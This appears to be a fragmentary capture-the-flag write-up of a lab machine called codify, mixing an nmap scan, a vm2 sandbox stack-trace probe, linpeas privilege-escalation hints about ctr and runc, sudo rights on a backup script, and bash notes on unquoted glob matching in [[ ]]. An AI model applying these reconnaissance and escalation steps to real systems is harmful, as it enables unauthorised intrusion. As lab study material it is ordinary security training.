kali@kali ~> nmap -p- -n --min-rate 2000 -T4 10.10.11.239 Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-0913:32 EST Warning: 10.10.11.239 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.11.239 Host is up (0.26s latency). Not shown: 62499 filtered tcp ports (no-response), 3034 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 225.27 seconds
functionstackTrace() { var err = newError(); console.log(err.stack); } stackTrace();
运行上面命令,可以成功得到如下栈信息:
Error at stackTrace (vm.js:2:15) at vm.js:5:1 at Script.runInContext (node:vm:135:12) at VM.runScript (/var/www/editor/node_modules/vm2/lib/vm.js:285:18) at /var/www/editor/node_modules/vm2/lib/vm.js:507:16 at timeout_bridge.js:1:1 at Script.runInContext (node:vm:135:12) at doWithTimeout (/var/www/editor/node_modules/vm2/lib/vm.js:132:29) at VM.run (/var/www/editor/node_modules/vm2/lib/vm.js:506:10) at /var/www/editor/index.js:51:27
╔══════════╣ Checking if containerd(ctr) is available ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╔══════════╣ Checking if runc is available ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Searching root files in home dirs (limit 30) /root/ /var/www
MatchingDefaults entries for joshua on codify: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh
The shell performs tilde expansion, parameter and variable expansion, arithmetic expansion, command substitution, process substitution, and quote removal on those words (the expansions that would occur if the words were enclosed in double quotes).
第二个链接里也有一句:
With the [[ … ]] construct, both = and == are equal (at least in Bash) and the right side of the operator is taken as a pattern, like in a filename glob, unless it is quoted. (Filenames are not expanded within [[ … ]]).